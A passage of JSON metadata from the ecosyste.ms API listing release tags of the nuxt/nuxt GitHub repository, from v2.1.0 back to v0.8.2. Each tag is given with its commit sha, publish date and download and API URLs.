ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v